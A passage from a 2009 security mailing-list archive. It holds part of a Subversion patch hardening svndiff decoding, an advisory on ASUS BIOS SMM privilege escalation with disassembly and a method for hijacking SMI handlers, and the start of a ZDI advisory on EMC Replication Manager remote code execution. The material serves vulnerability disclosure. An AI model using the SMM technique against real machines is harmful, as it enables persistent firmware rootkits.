svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL, + _("Decompression of svndiff data failed: no size")); + if (len > limit) + return svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL, + _("Decompression of svndiff data failed: " + "size too large")); /* We need to subtract the size of the encoded original length off the * still remaining input length. */ in->len -= (in->data - oldplace); @@ -487,10 +513,10 @@ count_and_verify_instructions(int *ninst, return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, _("Invalid diff stream: insn %d cannot be decoded"), n); - else if (op.length <= 0) + else if (op.length == 0) return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, - _("Invalid diff stream: insn %d has non-positive length"), n); + _("Invalid diff stream: insn %d has length zero"), n); else if (op.length > tview_len - tpos) return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, @@ -499,7 +525,8 @@ count_and_verify_instructions(int *ninst, switch (op.action_code) { case svn_txdelta_source: - if (op.length > sview_len - op.offset) + if (op.length > sview_len - op.offset || + op.offset > sview_len) return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, _("Invalid diff stream: " @@ -565,11 +592,11 @@ decode_window(svn_txdelta_window_t *window, svn_fi instin = svn_stringbuf_ncreate((const char *)data, insend - data, pool); instout = svn_stringbuf_create("", pool); - SVN_ERR(zlib_decode(instin, instout)); + SVN_ERR(zlib_decode(instin, instout, MAX_INSTRUCTION_SECTION_LEN)); ndin = svn_stringbuf_ncreate((const char *)insend, newlen, pool); ndout = svn_stringbuf_create("", pool); - SVN_ERR(zlib_decode(ndin, ndout)); + SVN_ERR(zlib_decode(ndin, ndout, SVN_DELTA_WINDOW_SIZE)); newlen = ndout->len; data = (unsigned char *)instout->data; @@ -685,6 +712,14 @@ write_handler(void *baton, if (p == NULL) return SVN_NO_ERROR; + if (tview_len > SVN_DELTA_WINDOW_SIZE || + sview_len > SVN_DELTA_WINDOW_SIZE || + /* for svndiff1, newlen includes the original length */ + newlen > SVN_DELTA_WINDOW_SIZE + MAX_ENCODED_INT_LEN || + inslen > MAX_INSTRUCTION_SECTION_LEN) + return svn_error_create(SVN_ERR_SVNDIFF_CORRUPT_WINDOW, NULL, + _("Svndiff contains a too-large window")); + /* Check for integer overflow. */ if (sview_offset < 0 || inslen + newlen < inslen || sview_len + tview_len < sview_len @@ -841,6 +876,14 @@ read_window_header(svn_stream_t *stream, svn_files SVN_ERR(read_one_size(inslen, stream)); SVN_ERR(read_one_size(newlen, stream)); + if (*tview_len > SVN_DELTA_WINDOW_SIZE || + *sview_len > SVN_DELTA_WINDOW_SIZE || + /* for svndiff1, newlen includes the original length */ + *newlen > SVN_DELTA_WINDOW_SIZE + MAX_ENCODED_INT_LEN || + *inslen > MAX_INSTRUCTION_SECTION_LEN) + return svn_error_create(SVN_ERR_SVNDIFF_CORRUPT_WINDOW, NULL, + _("Svndiff contains a too-large window")); + /* Check for integer overflow. */ if (*sview_offset < 0 || *inslen + *newlen < *inslen || *sview_len + *tview_len < *sview_len Index: subversion/libsvn_delta/text_delta.c =================================================================== --- subversion/libsvn_delta/text_delta.c (revision 38519) +++ subversion/libsvn_delta/text_delta.c (working copy) @@ -548,7 +548,7 @@ svn_txdelta_target_push(svn_txdelta_window_handler /* Functions for applying deltas. */ /* Ensure that BUF has enough space for VIEW_LEN bytes. */ -static APR_INLINE void +static APR_INLINE svn_error_t * size_buffer(char **buf, apr_size_t *buf_size, apr_size_t view_len, apr_pool_t *pool) { @@ -557,8 +557,11 @@ size_buffer(char **buf, apr_size_t *buf_size, *buf_size *= 2; if (*buf_size < view_len) *buf_size = view_len; + SVN_ERR_ASSERT(APR_ALIGN_DEFAULT(*buf_size) >= *buf_size); *buf = apr_palloc(pool, *buf_size); } + + return SVN_NO_ERROR; } @@ -659,7 +662,7 @@ apply_window(svn_txdelta_window_t *window, void *b >= ab->sbuf_offset + ab->sbuf_len))); /* Make sure there's enough room in the target buffer. */ - size_buffer(&ab->tbuf, &ab->tbuf_size, window->tview_len, ab->pool); + SVN_ERR(size_buffer(&ab->tbuf, &ab->tbuf_size, window->tview_len, ab->pool)); /* Prepare the source buffer for reading from the input stream. */ if (window->sview_offset != ab->sbuf_offset @@ -668,7 +671,8 @@ apply_window(svn_txdelta_window_t *window, void *b char *old_sbuf = ab->sbuf; /* Make sure there's enough room. */ - size_buffer(&ab->sbuf, &ab->sbuf_size, window->sview_len, ab->pool); + SVN_ERR(size_buffer(&ab->sbuf, &ab->sbuf_size, window->sview_len, + ab->pool)); /* If the existing view overlaps with the new view, copy the * overlap to the beginning of the new buffer. */ ]]] This patch applies to Subversion 1.5.x: [[[ Index: subversion/libsvn_delta/svndiff.c =================================================================== --- subversion/libsvn_delta/svndiff.c (revision 38498) +++ subversion/libsvn_delta/svndiff.c (working copy) @@ -55,10 +55,23 @@ struct encoder_baton { apr_pool_t *pool; }; +/* This is at least as big as the largest size of an integer that + encode_int can generate; it is sufficient for creating buffers for + it to write into. This assumes that integers are at most 64 bits, + and so 10 bytes (with 7 bits of information each) are sufficient to + represent them. */ +#define MAX_ENCODED_INT_LEN 10 +/* This is at least as big as the largest size for a single instruction. */ +#define MAX_INSTRUCTION_LEN (2*MAX_ENCODED_INT_LEN+1) +/* This is at least as big as the largest possible instructions + section: in theory, the instructions could be SVN_DELTA_WINDOW_SIZE + 1-byte copy-from-source instructions (though this is very unlikely). */ +#define MAX_INSTRUCTION_SECTION_LEN (SVN_DELTA_WINDOW_SIZE*MAX_INSTRUCTION_LEN) /* Encode VAL into the buffer P using the variable-length svndiff integer format. Return the incremented value of P after the - encoded bytes have been written. + encoded bytes have been written. P must point to a buffer of size + at least MAX_ENCODED_INT_LEN. This encoding uses the high bit of each byte as a continuation bit and the other seven bits as data bits. High-order data bits are @@ -91,6 +104,8 @@ encode_int(char *p, svn_filesize_t val) n++; } + assert(n <= MAX_ENCODED_INT_LEN); + /* Encode the remaining bytes; n is always the number of bytes coming after the one we're encoding. */ while (--n >= 0) @@ -107,7 +122,7 @@ encode_int(char *p, svn_filesize_t val) static void append_encoded_int(svn_stringbuf_t *header, svn_filesize_t val) { - char buf[128], *p; + char buf[MAX_ENCODED_INT_LEN], *p; p = encode_int(buf, val); svn_stringbuf_appendbytes(header, buf, p - buf); @@ -163,7 +178,7 @@ window_handler(svn_txdelta_window_t *window, void svn_stringbuf_t *i1 = svn_stringbuf_create("", pool); svn_stringbuf_t *header = svn_stringbuf_create("", pool); const svn_string_t *newdata; - char ibuf[128], *ip; + char ibuf[MAX_INSTRUCTION_LEN], *ip; const svn_txdelta_op_t *op; apr_size_t len; @@ -341,6 +356,8 @@ decode_file_offset(svn_filesize_t *val, const unsigned char *p, const unsigned char *end) { + if (p + MAX_ENCODED_INT_LEN < end) + end = p + MAX_ENCODED_INT_LEN; /* Decode bytes until we're done. */ *val = 0; while (p < end) @@ -360,6 +377,8 @@ decode_size(apr_size_t *val, const unsigned char *p, const unsigned char *end) { + if (p + MAX_ENCODED_INT_LEN < end) + end = p + MAX_ENCODED_INT_LEN; /* Decode bytes until we're done. */ *val = 0; while (p < end) @@ -377,7 +396,7 @@ decode_size(apr_size_t *val, data is not compressed. */ static svn_error_t * -zlib_decode(svn_stringbuf_t *in, svn_stringbuf_t *out) +zlib_decode(svn_stringbuf_t *in, svn_stringbuf_t *out, apr_size_t limit) { apr_size_t len; char *oldplace = in->data; @@ -385,6 +404,13 @@ static svn_error_t * /* First thing in the string is the original length. */ in->data = (char *)decode_size(&len, (unsigned char *)in->data, (unsigned char *)in->data+in->len); + if (in->data == NULL) + return svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL, + _("Decompression of svndiff data failed: no size")); + if (len > limit) + return svn_error_create(SVN_ERR_SVNDIFF_INVALID_COMPRESSED_DATA, NULL, + _("Decompression of svndiff data failed: " + "size too large")); /* We need to subtract the size of the encoded original length off the * still remaining input length. */ in->len -= (in->data - oldplace); @@ -482,10 +508,10 @@ count_and_verify_instructions(int *ninst, return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, _("Invalid diff stream: insn %d cannot be decoded"), n); - else if (op.length <= 0) + else if (op.length == 0) return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, - _("Invalid diff stream: insn %d has non-positive length"), n); + _("Invalid diff stream: insn %d has length zero"), n); else if (op.length > tview_len - tpos) return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, @@ -494,7 +520,8 @@ count_and_verify_instructions(int *ninst, switch (op.action_code) { case svn_txdelta_source: - if (op.length > sview_len - op.offset) + if (op.length > sview_len - op.offset || + op.offset > sview_len) return svn_error_createf (SVN_ERR_SVNDIFF_INVALID_OPS, NULL, _("Invalid diff stream: " @@ -560,11 +587,11 @@ decode_window(svn_txdelta_window_t *window, svn_fi instin = svn_stringbuf_ncreate((const char *)data, insend - data, pool); instout = svn_stringbuf_create("", pool); - SVN_ERR(zlib_decode(instin, instout)); + SVN_ERR(zlib_decode(instin, instout, MAX_INSTRUCTION_SECTION_LEN)); ndin = svn_stringbuf_ncreate((const char *)insend, newlen, pool); ndout = svn_stringbuf_create("", pool); - SVN_ERR(zlib_decode(ndin, ndout)); + SVN_ERR(zlib_decode(ndin, ndout, SVN_DELTA_WINDOW_SIZE)); newlen = ndout->len; data = (unsigned char *)instout->data; @@ -680,6 +707,14 @@ write_handler(void *baton, if (p == NULL) return SVN_NO_ERROR; + if (tview_len > SVN_DELTA_WINDOW_SIZE || + sview_len > SVN_DELTA_WINDOW_SIZE || + /* for svndiff1, newlen includes the original length */ + newlen > SVN_DELTA_WINDOW_SIZE + MAX_ENCODED_INT_LEN || + inslen > MAX_INSTRUCTION_SECTION_LEN) + return svn_error_create(SVN_ERR_SVNDIFF_CORRUPT_WINDOW, NULL, + _("Svndiff contains a too-large window")); + /* Check for integer overflow. */ if (sview_offset < 0 || inslen + newlen < inslen || sview_len + tview_len < sview_len @@ -836,6 +871,14 @@ read_window_header(svn_stream_t *stream, svn_files SVN_ERR(read_one_size(inslen, stream)); SVN_ERR(read_one_size(newlen, stream)); + if (*tview_len > SVN_DELTA_WINDOW_SIZE || + *sview_len > SVN_DELTA_WINDOW_SIZE || + /* for svndiff1, newlen includes the original length */ + *newlen > SVN_DELTA_WINDOW_SIZE + MAX_ENCODED_INT_LEN || + *inslen > MAX_INSTRUCTION_SECTION_LEN) + return svn_error_create(SVN_ERR_SVNDIFF_CORRUPT_WINDOW, NULL, + _("Svndiff contains a too-large window")); + /* Check for integer overflow. */ if (*sview_offset < 0 || *inslen + *newlen < *inslen || *sview_len + *tview_len < *sview_len Index: subversion/libsvn_delta/text_delta.c =================================================================== --- subversion/libsvn_delta/text_delta.c (revision 38498) +++ subversion/libsvn_delta/text_delta.c (working copy) @@ -498,7 +498,7 @@ svn_txdelta_target_push(svn_txdelta_window_handler /* Functions for applying deltas. */ /* Ensure that BUF has enough space for VIEW_LEN bytes. */ -static APR_INLINE void +static APR_INLINE svn_error_t * size_buffer(char **buf, apr_size_t *buf_size, apr_size_t view_len, apr_pool_t *pool) { @@ -507,8 +507,13 @@ size_buffer(char **buf, apr_size_t *buf_size, *buf_size *= 2; if (*buf_size < view_len) *buf_size = view_len; + if (APR_ALIGN_DEFAULT(*buf_size) < *buf_size) + return svn_error_create(SVN_ERR_SVNDIFF_INVALID_OPS, NULL, + "Diff stream resulted in invalid buffer size."); *buf = apr_palloc(pool, *buf_size); } + + return SVN_NO_ERROR; } @@ -609,7 +614,7 @@ apply_window(svn_txdelta_window_t *window, void *b >= ab->sbuf_offset + ab->sbuf_len))); /* Make sure there's enough room in the target buffer. */ - size_buffer(&ab->tbuf, &ab->tbuf_size, window->tview_len, ab->pool); + SVN_ERR(size_buffer(&ab->tbuf, &ab->tbuf_size, window->tview_len, ab->pool)); /* Prepare the source buffer for reading from the input stream. */ if (window->sview_offset != ab->sbuf_offset @@ -618,7 +623,8 @@ apply_window(svn_txdelta_window_t *window, void *b char *old_sbuf = ab->sbuf; /* Make sure there's enough room. */ - size_buffer(&ab->sbuf, &ab->sbuf_size, window->sview_len, ab->pool); + SVN_ERR(size_buffer(&ab->sbuf, &ab->sbuf_size, window->sview_len, + ab->pool)); /* If the existing view overlaps with the new view, copy the * overlap to the beginning of the new buffer. */ ]]] From core_collapse at hush.com Fri Aug 7 20:08:04 2009 From: core_collapse at hush.com (core collapse) Date: Fri, 07 Aug 2009 21:08:04 +0200 Subject: [Full-disclosure] ASUS Eee PC and other series: BIOS SMM privilege escalation vulnerabilities Message-ID: <20090807190804.EC18FB807F@smtp.hushmail.com> Numerous System Management Mode (SMM) privilege escalation vulnerabilities in ASUS motherboards including Eee PC series Release Date: ~~~~~~~~~~~~~ 07.08.09 Timeline: ~~~~~~~~~ March 08, 2009: first attempt to contact vendor, no response March 16, 2009: second attempt to contact vendor, no response July 18, 2009: CERT contacted, full details of vulnerabilities disclosed to CERT and to the vendor July 21, 2009: CERT assigned VU#576329 August 07, 2009: public disclosure Severity: ~~~~~~~~~ Privilege Escalation and Code Execution in System Management Mode Vendor: ~~~~~~~ ASUS (www.asus.com) Systems Affected: ~~~~~~~~~~~~~~~~~ ASUS EeePC series ASUS P5* series ASUS B50A series ASUS P6T series other systems not tested Overview: ~~~~~~~~~ BIOS firmware on ASUS motherboards including on Eee PC series is affected by System Management Mode (SMM) privilege escalation vulnerabilities. Vulnerabilities allow an attacker with access to physical memory and port IO to run arbitrary code such as rootkit code in SMM memory with SMM privileges. Running arbitrary code with SMM privileges enables SMM Rootkits and circumvents operating systems and Virtual Machine Monitor (VMM) protections. Details: ~~~~~~~~ BIOS firmware on a motherboard contains special code with multiple SMI handlers that run in System Management Mode and are loaded at boot time into protected part of RAM (SMRAM). Disassembly of the code of $SMISS handler, one of SMI handlers in the BIOS firmware in ASUS Eee PC 1000HE system. 0003F073: 50 push ax 0003F074: B4A1 mov ah,0A1 ** 0003F076: 9A197D00F0 call 0F000:07D19 0003F07B: 2404 and al,004 0003F07D: 7414 je 00003F093 0003F07F: B434 mov ah,034 ** 0003F081: 9A708000F0 call 0F000:08070 0003F086: 2410 and al,010 0003F088: 7409 je 00003F093 0003F08A: B430 mov ah,030 ** 0003F08C: 9A708000F0 call 0F000:08070 0003F091: 2410 and al,010 0003F093: 3C01 cmp al,001 0003F095: 58 pop ax 0003F096: CB retf 0003F097: 0E push cs 0003F098: E8D8FF call 00003F073 0003F09B: B80100 mov ax,00001 0003F09E: 0F82C500 jb 00003F167 0003F0A2: B81034 mov ax,03410 ** 0003F0A5: 9A7B8000F0 call 0F000:0807B 0003F0AA: B81030 mov ax,03010 ** 0003F0AD: 9AAF8000F0 call 0F000:080AF 0003F0B2: 80265601FC and b,[0156],0FC 0003F0B7: 33DB xor bx,bx 0003F0B9: B88083 mov ax,08380 ** 0003F0BC: 9A89A100F0 call 0F000:0A189 ** 0003F0C1: 9AE0BD00F0 call 0F000:0BDE0 0003F0C6: 3C04 cmp al,004 0003F0C8: 750B jne 00003F0D5 0003F0CA: BB5400 mov bx,00054 0003F0CD: B88083 mov ax,08380 ** 0003F0D0: 9A89A100F0 call 0F000:0A189 ** 0003F0D5: 9AD0BD00F0 call 0F000:0BDD0 0003F0DA: 7505 jne 00003F0E1 0003F0DC: 800E560101 or b,[0156],001 0003F0E1: E8260E call 00003FF0A 0003F0E4: E82EFE call 00003EF15 0003F0E7: E8A200 call 00003F18C ** 0003F0EA: 9AE0BD00F0 call 0F000:0BDE0 0003F0EF: BEFFFF mov si,0FFFF 0003F0F2: 3C01 cmp al,001 0003F0F4: 740B je 00003F101 0003F0F6: B8B315 mov ax,015B3 ** 0003F0F9: 9A7DA100F0 call 0F000:0A17D 0003F0FE: 7501 jne 00003F101 0003F100: 46 inc si 0003F101: B9E800 mov cx,000E8 0003F104: BB0800 mov bx,00008 0003F107: E8ED00 call 00003F1F7 0003F10A: B9E900 mov cx,000E9 0003F10D: BB1000 mov bx,00010 0003F110: E8E400 call 00003F1F7 0003F113: B9EA00 mov cx,000EA 0003F116: BB0010 mov bx,01000 0003F119: E8DB00 call 00003F1F7 0003F11C: B9EB00 mov cx,000EB 0003F11F: BB0040 mov bx,04000 0003F122: E8D200 call 00003F1F7 0003F125: 9A1C0161AA call 0AA61:0011C ** 0003F12A: 9ACF0600F0 call 0F000:006CF ** 0003F12F: 9AE0BD00F0 call 0F000:0BDE0 0003F134: BBE282 mov bx,082E2 0003F137: 48 dec ax 0003F138: D0E0 shl al,1 0003F13A: 02D8 add bl,al 0003F13C: 80D700 adc bh,000 ** 0003F13F: 9AD0BD00F0 call 0F000:0BDD0 0003F144: 2EFF17 call w,cs:[bx] 0003F147: A05601 mov al,[0156] 0003F14A: 0C02 or al,002 0003F14C: E6B3 out 0B3,al 0003F14E: EB00 jmps 00003F150 0003F150: E8C100 call 00003F214 0003F150: E8C100 call 00003F214 0003F153: A1C600 mov ax,[00C6] 0003F156: 8B16CE00 mov dx,[00CE] 0003F15A: EF out dx,ax 0003F15B: B96400 mov cx,00064 0003F15E: E6ED out 0ED,al 0003F160: EB00 jmps 00003F162 0003F162: E2FA loop 00003F15E 0003F164: B80000 mov ax,00000 0003F167: CB retf The disassembly contains a bunch of calls to code segment 0F000 (instructions marked with **). Code segment 0F000 is translated to physical RAM addresses F0000h - 100000h. This region contains system BIOS code such as POST and BIOS interrupts. This segment is not protected by SMM memory protections like SMI code. Any process with sufficient privileges to access physical memory can replace contents of this region with own code. So, for instance, linear address 0F000:08070 in the above SMI handler is translated to physical address F8070h. During the boot this address gets loaded with BIOS code that reads registers in power management I/O space using ports 800h+offset: 00008387: BA0008 mov dx,00800 0000838A: 02D4 add dl,ah 0000838C: 80D600 adc dh,000 0000838F: C3 retn 00008390: 52 push dx 00008391: E8F3FF call 000008387 00008394: EC in al,dx 00008395: 5A pop dx 00008396: C3 retn ; These instructions are loaded to 0F000:08070 address ; (F8070h in physical memory) by the BIOS from ROM chip 00008397: E8F6FF call 000008390 0000839A: CB retf These BIOS instructions can be replaced with a jump to malicious code, so that this code will get executed by SMI handler with SMM privileges. Only one SMISS SMI handler has 14 SMM privilege escalation bugs! The very same bugs are present in other handlers, overall making the whole lot of 'em in ASUS BIOS. Vendor Status: ~~~~~~~~~~~~~~ No response from the vendor Credit: ~~~~~~~ core collapse ralf Links: ~~~~~~ A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers http://www.phrack.org/issues.html?issue=66&id=11#article [there's a bunch of other links in the article] Take care. From zdi-disclosures at tippingpoint.com Fri Aug 7 21:53:17 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Fri, 7 Aug 2009 15:53:17 -0500 Subject: [Full-disclosure] ZDI-09-051: EMC Replication Manager Client Control Service Remove Code Execution Vulnerability Message-ID: ZDI-09-051: EMC Replication Manager Client Control Service Remove Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-051 August 7, 2009 -- Affected Vendors: EMC -- Affected Products: EMC Replication Manager -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8028. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the EMC Replication Manager Client. Authentication is not required to exploit this vulnerability. The specific flaw exists within the irccd.exe process which listens by default on a TCP port around 6700. The XML-based protocol this service communicates over accepts a RunProgram message. By supplying a malicious payload and requesting this functionality a remote attacker can execute arbitrary code on the remote system. -- Vendor Response: EMC states: The fixes and advisory are available to customers at powerlink.emc.com . -- Disclosure Timeline: 2009-03-13 - Vulnerability reported to vendor 2009-08-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can fi